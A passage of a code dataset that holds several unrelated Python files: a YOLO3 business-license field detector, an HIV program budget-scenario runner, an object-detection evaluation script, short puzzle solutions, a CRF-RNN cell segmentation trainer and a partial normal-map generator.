(image.width % 32), image.height - (image.height % 32))\n boxed_image = letterbox_image(image, new_image_size)\n image_data = np.array(boxed_image, dtype='float32')\n print('detector size {}'.format(image_data.shape))\n image_data /= 255. # 转换0~1\n image_data = np.expand_dims(image_data, 0) # 添加批次维度,将图片增加1维\n\n # 参数盒子、得分、类别;输入图像0~1,4维;原始图像的尺寸\n out_boxes, out_scores, out_classes = self.sess.run(\n [self.boxes, self.scores, self.classes],\n feed_dict={\n self.yolo_model.input: image_data,\n self.input_image_shape: [image.size[1], image.size[0]],\n K.learning_phase(): 0\n })\n\n print('Found {} boxes for {}'.format(len(out_boxes), 'img')) # 检测出的框\n\n font = ImageFont.truetype(font='font/FiraMono-Medium.otf',\n size=np.floor(1e-2 * image.size[1] + 0.5).astype('int32')) # 字体\n thickness = (image.size[0] + image.size[1]) // 777 # 厚度\n for i, c in reversed(list(enumerate(out_classes))):\n predicted_class = self.class_names[c] # 类别\n box = out_boxes[i] # 框\n score = out_scores[i] # 执行度\n\n label = '{} {:.2f}'.format(predicted_class, score) # 标签\n draw = ImageDraw.Draw(image) # 画图\n label_size = draw.textsize(label, font) # 标签文字\n\n top, left, bottom, right = box\n top = max(0, np.floor(top + 0.5).astype('int32'))\n left = max(0, np.floor(left + 0.5).astype('int32'))\n bottom = min(image.size[1], np.floor(bottom + 0.5).astype('int32'))\n right = min(image.size[0], np.floor(right + 0.5).astype('int32'))\n print(label, (left, top), (right, bottom)) # 边框\n\n if top - label_size[1] >= 0: # 标签文字\n text_origin = np.array([left, top - label_size[1]])\n else:\n text_origin = np.array([left, top + 1])\n\n # My kingdom for a good redistributable image drawing library.\n for i in range(thickness): # 画框\n draw.rectangle(\n [left + i, top + i, right - i, bottom - i],\n outline=self.colors[c])\n draw.rectangle( # 文字背景\n [tuple(text_origin), tuple(text_origin + label_size)],\n fill=self.colors[c])\n draw.text(text_origin, label, fill=(0, 0, 0), font=font) # 文案\n del draw\n\n end = timer()\n print(end - start) # 检测执行时间\n return image\n\n def close_session(self):\n self.sess.close()\n\n\n\n'''\n后处理将yolo定位关键位置图片切成目标区\n单链接聚类\n'''\ndef after_process(image_path, result):\n\n '''\n reuslt:\n 0 = {list} : [13, 'CreditCode_1', 0.9705741, [792, 748, 979, 814]]\n 1 = {list} : [8, 'Person_1', 0.99604374, [217, 1135, 577, 1192]]\n 2 = {list} : [3, 'Address_1', 0.99387616, [219, 1045, 586, 1104]]\n 3 = {list} : [2, 'Company_1', 0.9963999, [242, 862, 566, 923]]\n 4 = {list} : [0, 'BusinessLicense_1', 0.9928785, [350, 503, 1293, 700]]\n\n output:\n [result_1,CUT(4坐标)]\n '''\n\n basename = os.path.basename(image_path)\n img = cv2.imread(image_path)\n (h,w,c) = img.shape\n\n need_box = []\n for res in result:\n if res[1].split('_')[0] != 'BusinessLicense': # and res[1].split('_')[0] != 'CreditCode' :\n need_box.append(res)\n\n result = AGNES(need_box,box_dist,C.Kmeans_Class)\n # 行聚类结果\n # print(result)\n\n after_process_result = []\n for class_i in range(len(result)):\n need_box = []\n Cut_Long = False\n for box_i in result[class_i]:\n need_box.append(box_i[3])\n if box_i[1].split('_')[0] == 'CreditCode':\n Cut_Long = True\n need_box_np = np.array(need_box)\n print(need_box_np,need_box_np.shape)\n min_left = need_box_np.min(axis=0)[0]\n min_top = need_box_np.min(axis=0)[1]\n max_right = need_box_np.max(axis=0)[2]\n min_right = need_box_np.min(axis=0)[2]\n max_down = need_box_np.max(axis=0)[3]\n if Cut_Long:\n # 保留title\n cut_box = (min_top-C.Cut_Pixel,max_down+C.Cut_Pixel,min_left,w) # (y_min,y_max,x_min,x_max)\n cut_img = img[cut_box[0]:cut_box[1], cut_box[2]:cut_box[3]]\n for box_update_i in result[class_i]:\n # 更新yolo box的相对位置\n box_update_i[3][0] = box_update_i[3][0] - cut_box[2]\n box_update_i[3][2] = box_update_i[3][2] - cut_box[2]\n box_update_i[3][1] = box_update_i[3][1] - cut_box[0]\n box_update_i[3][3] = box_update_i[3][3] - cut_box[0]\n after_process_result.append([result[class_i],cut_img])\n else:\n cut_box = (min_top-C.Cut_Pixel, max_down+C.Cut_Pixel, min_left, w)\n cut_img = img[cut_box[0]:cut_box[1], cut_box[2]:cut_box[3]]\n for box_update_i in result[class_i]:\n # 更新yolo box的相对位置\n box_update_i[3][0] = box_update_i[3][0] - cut_box[2]\n box_update_i[3][2] = box_update_i[3][2] - cut_box[2]\n box_update_i[3][1] = box_update_i[3][1] - cut_box[0]\n box_update_i[3][3] = box_update_i[3][3] - cut_box[0]\n after_process_result.append([result[class_i], cut_img])\n\n # cv2.imwrite(str(class_i)+basename, cut_img)\n\n return (image_path,after_process_result)\n\n\ndef after_process_ctpn(ctpn, image_path, result):\n '''\n ctpn处理\n :param after_process_result:\n :return:\n '''\n\n # import pickle\n # import ctpn_predict\n # with open('result.obj', 'rb') as config_f:\n # (image_path, result) = pickle.load(config_f)\n # ctpn = ctpn_predict.id_card_word_position()\n\n i = 3\n basename = os.path.basename(image_path)\n\n for pic_i in result:\n # 分别处理一张图\n image = pic_i[1]\n m_img_copy = image.copy()\n\n (h, w, c) = image.shape\n\n info = pic_i[0]\n title_box = []\n title_classname = []\n title_score = []\n for info_i in info:\n title_box.append(info_i[3])\n title_classname.append(info_i[1])\n title_score.append(info_i[2])\n\n # cv2.rectangle(m_img_copy, (info_i[3][0], info_i[3][1]),\n # (info_i[3][2], info_i[3][3]), (0, 255, 0), 2)\n\n title_box_np = np.array(title_box)\n min_right = title_box_np.min(axis=0)[2]\n\n cut_y_min = 0\n cut_y_max = h\n cut_x_min = min_right + 1\n cut_x_max = w\n image_cut = image[cut_y_min:cut_y_max, cut_x_min:cut_x_max]\n # 调用函数\n boxes, m_img, scale = ctpn.predict_zhizhao(GetRedC(image_cut))\n\n ctpn_boxes = []\n for box in boxes:\n print(box)\n x1 = int(box[0] / scale)\n y1 = int(box[1] / scale)\n x2 = int(box[2] / scale)\n y2 = int(box[3] / scale)\n x1 = x1 + cut_x_min\n x2 = x2 + cut_x_min\n\n # print('yolo')\n # print(scale)\n # print(m_img_copy.shape)\n # print([x1,y1,x2,y2])\n\n ctpn_boxes.append([x1,y1,x2,y2])\n # cv2.rectangle(m_img_copy, (x1, y1),\n # (x2, y2), (0, 0, 255), 3)\n\n ## 算法: 近邻box\n\n print(title_box,ctpn_boxes)\n title_box, ctpn_boxes,ctpn_boxes_best_choose,ctpn_boxes_good_choose = idokonw(title_box,ctpn_boxes,title_classname)\n\n colors = [(0, 0, 255),(0, 255, 255),(0, 255, 0),(255, 0, 0),(255, 255, 0),(255, 255, 255)]\n for box_i,box in enumerate(title_box):\n cv2.rectangle(m_img_copy, (box[0], box[1]),\n (box[2], box[3]), colors[box_i], 3)\n if ctpn_boxes_best_choose[box_i][0] != -1:\n box = ctpn_boxes[int(ctpn_boxes_best_choose[box_i][0])]\n cv2.rectangle(m_img_copy, (box[0], box[1]),\n (box[2], box[3]), colors[box_i], 3)\n if ctpn_boxes_good_choose[box_i][0] != -1:\n box = ctpn_boxes[int(ctpn_boxes_good_choose[box_i][0])]\n cv2.rectangle(m_img_copy, (box[0], box[1]),\n (box[2], box[3]), colors[box_i], 1)\n # for box in ctpn_boxes:\n # cv2.rectangle(m_img_copy, (box[0], box[1]),\n # (box[2], box[3]), (0, 255, 0), 3)\n\n pass\n\n\n cv2.imwrite(str(i) +'_ctpn_' + basename, m_img_copy)\n i = i + 1\n\n\n\ndef get_path_list(rootdir):\n '''\n :return: self.FilePathList\n '''\n FilePathList = []\n for fpathe, dirs, fs in os.walk(rootdir):\n for f in fs:\n FilePath = os.path.join(fpathe, f)\n if os.path.isfile(FilePath):\n FilePathList.append(FilePath)\n return FilePathList\n\n###################################################### test\n\ndef detect_img_for_test():\n yolo = YOLO3()\n img_path = r'./hard/201811056769216300000000000002-05M_0.jpg'\n image = Image.open(img_path)\n (image_path, result) = yolo.predict(image,image_path=img_path)\n after_process(image_path, result)\n print(result)\n # r_image = yolo.detect_image(image)\n yolo.close_session()\n # r_image.save('1.png')\n\n# 检查yolo3 模型效果\ndef detect_img_for_batch():\n yolo = YOLO3()\n FileList = get_path_list('./hard')\n for f in FileList:\n image = Image.open(f)\n r_image = yolo.detect_image(image)\n basename = os.path.basename(f)\n r_image.save('./result_data/' + basename)\n yolo.close_session()\n\ndef detect_img_for_batch_predict():\n yolo = YOLO3()\n ctpn = ctpn_predict.id_card_word_position()\n\n FileList = get_path_list(r'C:\\004_project\\012-yolo\\ZZ_Dection\\test_data')\n for f in FileList:\n print('handle' + f)\n image = Image.open(f)\n (image_path, result) = yolo.predict(image, image_path=f)\n # 单链接聚类\n (image_path, after_process_result) = after_process(image_path, result)\n # bbox dist\n after_process_ctpn(ctpn, image_path, after_process_result)\n\n yolo.close_session()\n\n\ndef predict_img():\n yolo = YOLO3()\n img_path = r'./test_data/201811059637005600000000000001-07M_0.jpg'\n image = Image.open(img_path)\n (image_path, result) = yolo.predict(image,image_path=img_path)\n\n yolo.close_session()\n\n # r_image.save('1.png')\n\n\n\n\nif __name__ == '__main__':\n # predict_img()\n # detect_img_for_test()\n # detect_img_for_batch()\n detect_img_for_batch_predict()\n # after_process_ctpn()\n # import pickle\n # with open('result.obj', 'rb') as config_f:\n # (image_path, result) = pickle.load(config_f)\n # print(result)\n #\n # after_process(image_path, result)\n\n pass\n\n\n\n\n\n\n\n\n\n","sub_path":"yolo3_predict_v1.py","file_name":"yolo3_predict_v1.py","file_ext":"py","file_size_in_byte":17305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"540123223","text":"\"\"\"\nRUNBUDGET\n\nRun a single budget.\n\"\"\"\n\n\nimport sys; sys.path.append('/u/cliffk/unsw/optima/server/src/sim')\nfrom optimize import runmodelalloc\nfrom copy import deepcopy\nfrom dataio import loaddata\nfrom utils import findinds\nfrom numpy import arange\nfrom gatherplotdata import gathermultidata\nfrom viewresults import viewmultiresults\nfrom timevarying import timevarying\nfrom matplotlib.pylab import subplot, pie, figure, array\nimport colorbrewer\n\nsys.path.append(r'C:\\Users\\Rgray\\Documents\\Research\\!Optima_Development\\optimamodel\\Optima\\server\\src\\sim')\norigfile = r'C:\\Users\\Rgray\\Google Drive\\Shared Projects\\analyses-data\\Indonesia\\projects\\Indonesia2015workshop-GF2.json'\nnewfile = r'C:\\Users\\Rgray\\Google Drive\\Shared Projects\\analyses-data\\Indonesia\\projects\\Indonesia2015workshop-scenarios.json'\n\noutfilename = r'C:\\Users\\Rgray\\Google Drive\\Shared Projects\\analyses-data\\Indonesia\\output\\scenariosGF'\n\n## Set parameters\nverbose = 8\nntimepm = 1 # AS: Just use 1 or 2 parameters... using 3 or 4 can cause problems that I'm yet to investigate\nrandseed = 0\nstart = 2015\nend = 2030\ndoplot = False\ndosaveCliff = False\ndosave = True\n\n\nD = loaddata(origfile)\ninitialindex = findinds(D['opt']['partvec'], start)\nfinalparindex = findinds(D['opt']['partvec'], end)\nparindices = arange(initialindex,finalparindex)\n\n# Specify programs and budgets\nprognames = [u'Condoms and BCC (P)', u'FSW programs (P)', u'MSM programs (P)', \nu'OST', u'NSP (NP)', u'ART', u'PMTCT', u'MGMT', u'M&E', u'Other', u'HTC (P)', \nu'HTC (NP)', u'Condoms and BCC (NP)', u'FSW programs (NP)', u'MSM programs (NP)']\nallocOrig = [1.27835818e+06, 4.48478110e+05, 9.94186776e+05,\n 1.66444510e+05, 5.28590039e+06, 3.11815379e+07,\n 1.23095012e+05, 1.60732203e+07, 1.19850462e+07,\n 3.76615980e+06, 1.16737956e+03, 7.67168093e+04,\n 6.24139582e+06, 2.18962842e+06, 4.85397073e+06]\nallocNoGF = [0, 0, 0,\n 0, 0, 3.11815379e+07,\n 0, 1.60732203e+07, 1.19850462e+07,\n 3.76615980e+06, 0, 0,\n 0, 0, 0] \nallocGF = [0, 915876, 1047422,\n 65395, 2076806, 38304235,\n 620027, 24920965, 13643745,\n 7258367, 0, 0,\n 0, 4471631, 5113884]\nallocGFextra = [0, 1492224, 1440046,\n 82467, 2618967, 43728628,\n 1820070, 25215654, 13887271,\n 7985905, 0, 0,\n 0, 7285566, 7030815]\n\nif doplot:\n bmap = colorbrewer.get_map('Paired', 'Qualitative', len(prognames)) # WARNING, won't work with >13\n colors = bmap.mpl_colors\n figure(figsize=(12,6))\n subplot(1,2,1)\n pie(alloc2018, labels=prognames, colors=colors)\n subplot(1,2,2)\n pie(newalloc, labels=prognames, colors=colors)\n\nallocs = [allocOrig, allocNoGF, allocGF, allocGFextra]\nfor i,alloc in enumerate(allocs):\n allocs[i] = timevarying(alloc, ntimepm=1, nprogs=len(allocOrig), tvec=D['opt']['partvec'], totalspend=sum(alloc)) \n\n\nlabels = ['allocOrig', 'allocNoGF','allocGF','allocGFextra']\nresult = dict()\nresult['Rarr'] = []\nfor thisalloc in allocs:\n R = runmodelalloc(D, thisalloc, allocOrig, parindices, randseed, rerunfinancial=False, verbose=2)\n result['kind'] = 'money'\n result['Rarr'].append(dict()) # Append a structure\n result['Rarr'][-1]['R'] = deepcopy(R) # Store the R structure (results)\n result['Rarr'][-1]['label'] = labels.pop(0) # Store labels, one at a time\n\n\nmulti = gathermultidata(D, result['Rarr'])\nif doplot: viewmultiresults(multi)\n\nprint('\\nOriginal/new total:')\nprint(sum(allocOrig))\nprint(sum(allocNoGF))\nprint(sum(allocGF))\nprint(sum(allocGFextra))\n\nprint('\\nOriginal/new deaths in 2020:')\nprint(multi['death']['tot']['best'][0][20])\nprint(multi['death']['tot']['best'][1][20])\n\n# Cliff's version of save\nif dosaveCliff:\n from gatherplotdata import gatheroptimdata\n from optimize import saveoptimization, defaultobjectives, defaultconstraints\n from dataio import savedata\n objectives = defaultobjectives(D)\n constraints = defaultconstraints(D)\n D.pop('optimizations')\n D['plot'].pop('optim')\n \n ## Gather plot data\n plot_result = gatheroptimdata(D, result, verbose=verbose)\n if 'optim' not in D['plot']: D['plot']['optim'] = [] # Initialize list if required\n D['plot']['optim'].append(plot_result) # In any case, append\n \n result_to_save = {'plot': [plot_result]}\n\n ## Save optimization to D\n D = saveoptimization(D, 'Minimize money: NSP', objectives, constraints, result_to_save, verbose=2)\n savedata(newfile, D)\n\n# My version of save \nimport pandas as pd\nfrom pandas import Series, ExcelWriter\nif dosave:\n # Now extract and save the results we are interested in as a dataframe in a CSV file\n programs = Series(prognames)\n curr_alloc = Series(allocOrig)\n no_gf = Series(allocNoGF)\n with_gf = Series(allocGF)\n with_gf_extra = Series(allocGFextra)\n \n # Infections\n curr_newinfects = Series(multi['inci']['tot']['best'][0])\n no_gf_newinfects = Series(multi['inci']['tot']['best'][1])\n gf_newinfects = Series(multi['inci']['tot']['best'][2])\n gfextra_newinfects = Series(multi['inci']['tot']['best'][3])\n \n # Deaths\n curr_deaths = Series(multi['death']['tot']['best'][0])\n no_gf_deaths = Series(multi['death']['tot']['best'][1])\n gf_deaths = Series(multi['death']['tot']['best'][2]) \n gfextra_deaths = Series(multi['death']['tot']['best'][3])\n \n # Create data frame \n Dfalloc = pd.concat({'Programs': programs, 'Current_Allocation': curr_alloc, 'No_Global_Fund': no_gf,\n 'With_Global_Fund':with_gf,'With_Extra':with_gf_extra}, axis = 1) \n \n Dfinfects = pd.concat({'current_infections': curr_newinfects,'No_GF_infections': no_gf_newinfects,\n 'GF_infections': gf_newinfects,'Extra_infections': gfextra_newinfects}, axis = 1) \n \n Dfdeaths = pd.concat({'current_deaths': curr_deaths,'No_GF_deaths': no_gf_deaths,\n 'GF_deaths': gf_deaths,'Extra_deaths': gfextra_deaths}, axis = 1)\n \n # Put results in an Excel file as well for quick viewing\n \n writer = ExcelWriter(outfilename+'.xlsx') \n Dfalloc.to_excel(writer,'Sheet1')\n Dfinfects.to_excel(writer,'Sheet2')\n Dfdeaths.to_excel(writer,'Sheet3')\n writer.save()\n printv('..result files created', 3, verbose)\n\nprint('\\n\\n\\nDONE.')\n\n","sub_path":"indonesia/runbudget.py","file_name":"runbudget.py","file_ext":"py","file_size_in_byte":6454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"119652197","text":"\"\"\"\nCOCO-Style Evaluations\n\"\"\"\nimport argparse\nimport torch\nimport yaml\nfrom tqdm import tqdm\nfrom model.efficientdet.backbone import EfficientDetBackbone\nfrom model.efficientdet.utils import BBoxTransform, ClipBoxes\nfrom utils import postprocess, boolean_string\nfrom dataloader.freicar_dataloader import FreiCarDataset\nfrom model.efficientdet.dataset import collater\nfrom torch.utils.data import DataLoader\nimport numpy as np\nimport matplotlib.pyplot as plt\n########################################################################\n# Object Detection model evaluation script\n# Modified by: Jannik Zuern (zuern@informatik.uni-freiburg.de)\n########################################################################\ndef metrics(predections: np.ndarray, labels: np.ndarray, iou_threshold: float):\n # Sum is used to identify ground truth with zero bounding box.\n sum = np.sum(labels)\n ious = []\n FP = 0\n TP = 0\n FN = 0\n # False positive case\n if sum == -5:\n FP = 1 * len(predections)\n # False Negative case\n elif len(predections) == 0:\n FN = len(labels)\n ious = [0] * len(labels)\n else:\n if len(labels) < len(predections):\n #These are unnecessary extra boxes\n FP = len(predections) - len(labels)\n ious = [0] * len(labels)\n for i in range(len(labels)):\n compare_iou = []\n # we are calculating iou of each ground truth w.r.t every predicted bounding box and selecting the best one\n # We using this logic to make sure if the prediction order is not inaccordence with ground truth order in case of multiple objects\n for j in range(len(predections)):\n intersection = (min(predections[j][2], labels[i][2]) - max(predections[j][0], labels[i][0])) * \\\n (min(predections[j][3], labels[i][3]) - max(predections[j][1], labels[i][1]))\n union = ((predections[j][2] - predections[j][0]) * (predections[j][3] - predections[j][1])) + (\n (labels[i][2] - labels[i][0]) *\n (labels[i][3] - labels[i][1])) - intersection\n compare_iou.append(intersection / union)\n ious[i] = np.max(compare_iou)\n else:\n ious = [0] * len(labels)\n for j in range(len(predections)):\n compare_iou = []\n # we are calculating iou of each ground truth w.r.t every predicted bounding box and selecting the best one\n # We using this logic to make sure if the prediction order is not inaccordence with ground truth order in case of multiple objects\n for i in range(len(labels)):\n intersection = (min(predections[j][2], labels[i][2]) - max(predections[j][0], labels[i][0])) * \\\n (min(predections[j][3], labels[i][3]) - max(predections[j][1], labels[i][1]))\n union = ((predections[j][2] - predections[j][0]) * (predections[j][3] - predections[j][1])) + (\n (labels[i][2] - labels[i][0]) *\n (labels[i][3] - labels[i][1])) - intersection\n compare_iou.append(intersection / union)\n ious[j] = np.max(compare_iou)\n for iou in ious:\n #There is a box but we are discarding because of threshold. Hence we add it to FN\n if iou < iou_threshold:\n FN += 1\n else:\n TP += 1\n return {\n \"ious\": ious,\n \"tp\": TP,\n \"fp\": FP,\n \"fn\": FN\n }\nap = argparse.ArgumentParser()\nap.add_argument('-p', '--project', type=str, default='freicar-detection', help='project file that contains parameters')\nap.add_argument('-c', '--compound_coef', type=int, default=0, help='coefficients of efficientdet')\nap.add_argument('-w', '--weights', type=str, default=None, help='/path/to/weights')\nap.add_argument('--nms_threshold', type=float, default=0.5, help='nms threshold, don\\'t change it if not for testing purposes')\nap.add_argument('--cuda', type=boolean_string, default=True)\nap.add_argument('--device', type=int, default=0)\nargs = ap.parse_args()\ncompound_coef = args.compound_coef\nnms_threshold = args.nms_threshold\nuse_cuda = args.cuda\ngpu = args.device\nproject_name = args.project\nweights_path = args.weights\nparams = yaml.safe_load(open(f'projects/{project_name}.yml'))\nobj_list = params['obj_list']\nthreshold = 0.2\niou_threshold = 0.2\nif __name__ == '__main__':\n '''\n Note: \n When calling the model forward function on an image, the model returns\n features, regression, classification and anchors.\n In order to obtain the final bounding boxes from these predictions, they need to be postprocessed\n (this performs score-filtering and non-maximum suppression)\n Thus, you should call\n regressBoxes = BBoxTransform()\n clipBoxes = ClipBoxes()\n preds = postprocess(imgs, anchors, regression, classification, regressBoxes, clipBoxes, threshold, nms_threshold) \n preds = preds[0]\n Now, the scores, class_indices and bounding boxes are saved as fields in the preds dict and can be used for subsequent evaluation.\n '''\n set_name = 'validation'\n freicar_dataset = FreiCarDataset(data_dir=\"./dataloader/data/\",\n padding=(0, 0, 12, 12),\n split=set_name,\n load_real=False)\n val_params = {'batch_size': 1,\n 'shuffle': False,\n 'drop_last': True,\n 'collate_fn': collater,\n 'num_workers': 1}\n freicar_generator = DataLoader(freicar_dataset, **val_params)\n # instantiate model\n model = EfficientDetBackbone(compound_coef=compound_coef,\n num_classes=len(obj_list),\n ratios=eval(params['anchors_ratios']),\n scales=eval(params['anchors_scales']))\n # load model weights file from disk\n model.load_state_dict(torch.load(weights_path, map_location=torch.device('cpu')))\n ##########################################\n # TODO: implement me!\n precision_list = []\n recall_list = []\n miou_list = []\n for j in range(0, 11):\n threshold = j * 0.1\n print(\"===================================\")\n print(threshold)\n model.eval()\n ious = []\n progress_bar = tqdm(freicar_generator)\n # when iou threshold = 1 false -ve and true +ve will be equal to zero we get divide by zero error so we are setting TP =1 as default.\n TP = 1\n FN = 0\n FP = 0\n for i, data in enumerate(progress_bar):\n with torch.no_grad():\n try:\n inputs = data['img'].float()\n labels = data['annot']\n features, regression, classification, anchors = model(inputs)\n regressBoxes = BBoxTransform()\n clipBoxes = ClipBoxes()\n preds = postprocess(inputs, anchors, regression, classification, regressBoxes, clipBoxes, threshold,\n nms_threshold)\n #print(labels)\n preds = preds[0]\n #print(preds)\n labels = torch.squeeze(labels)\n data = metrics(preds['rois'].reshape(-1, 4), labels.cpu().detach().numpy().reshape(-1, 5), iou_threshold)\n #print(data)\n ious += data['ious']\n TP += data['tp']\n FP += data['fp']\n FN += data['fn']\n #TP, TN, FP, FN = confusion_matrix(preds['rois'].reshape(-1,4), labels.cpu().detach().numpy().reshape(-1, 5), miou)\n except Exception as e:\n print(e)\n miou = np.mean(ious)\n print(\"miou : \", miou)\n precision = TP / (TP + FP)\n print(\"True positive: \", TP)\n print(\"FalsePositive: \", FP)\n print(\"False Negative: \", FN)\n print(\"Precision: \", precision)\n recall = TP / (TP + FN)\n print(\"recall : \", recall)\n precision_list.append(precision)\n recall_list.append(recall)\n miou_list.append(miou)\n ##########################################\nprecision_list = [precision_list[i] for i in np.argsort(recall_list)[::-1]]\nrecall_list = [recall_list[i] for i in np.argsort(recall_list)[::-1]]\nplt.plot([recall_list[i] for i in np.argsort(precision_list)[::-1]], [precision_list[i] for i in np.argsort(precision_list)[::-1]])\nplt.title(\"PR curve plot\")\nplt.xlabel(\"recall\")\nplt.ylabel(\"precision\")\nplt.grid()\nplt.savefig(\"precision recall curve.png\")\nprint(\"miou:\")\nprint(miou)\nprint(\"recall:\")\nprint(recall_list)\nprint(\"precision\")\nprint(precision_list)\naoc = 0\nfor i in range(len(recall_list)-1):\n aoc += ((recall_list[i] - recall_list[i+1]) * precision_list[i])\nprint(\"map: \", aoc)","sub_path":"ros_code/02-01-object-detection-exercise/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":9072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"38432760","text":"# Problem 121.py\r\n# \"Disc game prize fund\"\r\n#\r\n# Result - 2269\r\n#\r\n# Changelog:\r\n# 05.01.2017 - Script created\r\n\r\nfrom common import *\r\nfrom fractions import Fraction\r\n\r\nn_max = 15\r\nn_blue = [1]\r\n\r\nfor n in range(1, 1 + n_max):\r\n blue_prob = Fraction(1, 1 + n)\r\n new_n_blue = [Fraction(0, 1)]\r\n for i in n_blue:\r\n new_n_blue[-1] += i * (1 - blue_prob)\r\n new_n_blue.append(i * blue_prob)\r\n n_blue = new_n_blue\r\n\r\nresult = int(1/sum(n_blue[-n_max//2:]))\r\n\r\nprint_result(result)\r\n","sub_path":"Project Euler/Problem 121.py","file_name":"Problem 121.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"18081005","text":"import sys, os, numpy as np\nfrom PIL import Image, ImageDraw\nfrom crfrnn_model import get_crfrnn_model_def\nimport util\nfrom keras.utils import to_categorical\nfrom keras import metrics\n\nGenImSize = 128\nFitImSize = 500\n\ndef MakeCellImage(x, y, r, i):\n im = Image.new(mode='F', size=(GenImSize, GenImSize))\n draw = ImageDraw.Draw(im)\n draw.ellipse(xy=[x-r, y-r, x+r, y+r], fill='White')\n im = np.array(im).astype(np.float32)\n im *= (i / 255.0)\n return im\n\ndef MakeRandomCellImage(n):\n\tim = np.zeros(shape=(GenImSize, GenImSize))\n\tfor i in range(n):\n\t\tradius = np.random.randint(low=-5, high=10) + 10\n\t\tintensity = (np.random.randn() * 0.1) + 0.5\n\t\tintensity = max(min(intensity, 1.0), 0.0)\n\t\tposition = np.random.randint(low=radius, high=GenImSize-radius, size=2)\n\t\tim += MakeCellImage(position[0], position[1], radius, intensity)\n\t\t\n\tim_rand = im + (np.random.randn(im.shape[0], im.shape[1]) * 0.1) + 0.2\n\tim_rand[im_rand < 0] = 0\n\tim_rand[im_rand > 1] = 1\n\tim[im > 0] = 1\n\tim[im < 1] = 0\n\treturn im, im_rand\n\ndef MakeInputData(n, nBatch=64):\n\tim = np.zeros(shape=(FitImSize, FitImSize, nBatch))\n\tim_rand = np.zeros(shape=(FitImSize, FitImSize, 1, nBatch))\n\tfor i in range(nBatch):\n\t\tim_, im_rand_ = MakeRandomCellImage(n)\n\t\tim_ = Image.fromarray(im_)\n\t\tim_rand_ = Image.fromarray(im_rand_)\n\t\tim_rand_ = im_rand_.resize((FitImSize, FitImSize), Image.ANTIALIAS)\n\t\tim_ = im_.resize((FitImSize, FitImSize), Image.NEAREST)\n\t\tim_ = np.array(im_)\n\t\tim_rand_ = np.array(im_rand_)\n\t\tim_rand_ = im_rand_.astype(np.float32)\n\t\tim_rand_ -= np.mean(im_rand_.flatten())\n\t\tim_rand_ /= np.std(im_rand_.flatten())\n\n\t\tim_rand[:, :, 0, i] = im_rand_\n\t\tim[:, :, i] = im_\n\n\tim = to_categorical(im.transpose((2, 0, 1)), num_classes=2)\n\n\treturn im, im_rand.transpose((3, 0, 1, 2))\n\n\nepochesPerInput = 25\nnInputs = 40\nsaved_model_path = \"SegmentationModel_Weights.h5\"\n\nmodel = get_crfrnn_model_def()\n#model.load_weights(saved_model_path)\nmodel.compile(loss='binary_crossentropy', optimizer='adadelta', metrics=[metrics.binary_accuracy])\n\nfor i in range(nInputs):\n\tprint(\"---\\n---\")\n\tprint(\"Iteration {}/{}\".format(i+1, nInputs))\n\tprint(\"---\\n---\")\n\t\n\tlabels, im = MakeInputData(n=np.random.randint(low=1, high=5))\n\n\tmodel.fit(im, labels, batch_size=1,\n epochs=epochesPerInput, validation_split=0.05)\n\tmodel.save_weights(saved_model_path)","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"253094330","text":"\n# @Title: 罗马数字转整数 (Roman to Integer)\n# @Author: allan.wanglz@qq.com\n# @Date: 2020-06-18 22:20:31\n# @Runtime: 68 ms\n# @Memory: 13.8 MB\n\nclass Solution:\n def romanToInt(self, s: str) -> int:\n dict={'I':1,'V':5,'X':10,'L':50,'C':100,'D':500,'M':1000,'IV':-2,'IX':-2,'XL':-20,'XC':-20,'CD':-200,'CM':-200}\n sum=0\n for k in range (len(s)-1):\n sum=sum+dict[s[k]]\n if (s[k]+s[k+1] in dict):\n sum=sum+dict[s[k]+s[k+1]]\n sum=sum+dict[s[-1]]\n return sum\n","sub_path":"Problemset/roman-to-integer/roman-to-integer.py","file_name":"roman-to-integer.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"227308820","text":"import numpy as np\nimport scipy\nimport scipy.ndimage\nimport scipy.misc\nimport numpy.linalg as lin\n\ndef load(filename):\n\timage = scipy.ndimage.imread(filename)\n\treturn image\n\t\ndef save(filename, data):\n\tscipy.misc.imsave(filename, data)\n\t\ndef sample(map, coords):\n\t\n\ttake = map\n\tfor axis in range(0, len(coords)):\n\t\tgood_coord = coords[axis]\n\t\tif good_coord < 0:\n\t\t\tgood_coord = 0;\n\t\tif good_coord >= map.shape[axis]:\n\t\t\tgood_coord = map.shape[axis] - 1\n\t\ttake = take[good_coord]\n\t\n\treturn take\n\t\ndef replace_colour(image, colour, new_colour):\n\n\tfor row in range(0, len(image)):\n\t\tfor col in range(0, len(image[row])):\n\t\t\tpx_colour = image[row][col]\n\t\t\t\n\t\t\t# The == operator is element-wise. Each comparison returns a bool;\n\t\t\t# The sum is thus the number that match. If all elments match, then \n\t\t\t# the colours are equal.\n\t\t\tif np.sum(px_colour == colour) == len(colour):\n\t\t\t\timage[row][col] = new_colour\n\n\t\ndef make_normal(bump, z_scale=1.0, pixelWidth=None):\n\tif len(bump.shape) >= 3:\n\t\tprint(\"Bump not grayscale\");\n\t\treturn None\n\t\n\tif pixelWidth is None:\n\t\tpixelWidth = 1.0 / bump.shape[0]\n\t\n\tmap = np.zeros(shape=(bump.shape[0], bump.shape[1], 3), dtype=np.uint8)\n\tfor row in range(0, bump.shape[0]):\n\t\tfor col in range(0, bump.shape[1]):\n\t\t\t\n\t\t\tA = [\n\t\t\t\t[-pixelWidth, -pixelWidth, 1],\n\t\t\t\t[0, -pixelWidth, 1],\n\t\t\t\t[pixelWidth, -pixelWidth, 1],\n\t\t\t\t[-pixelWidth, 0, 1],\n\t\t\t\t[0, 0, 1],\n\t\t\t\t[pixelWidth, 0, 1],\n\t\t\t\t[-pixelWidth, pixelWidth, 1],\n\t\t\t\t[0, pixelWidth, 1],\n\t\t\t\t[pixelWidth, pixelWidth, 1]]\n\t\t\tz = 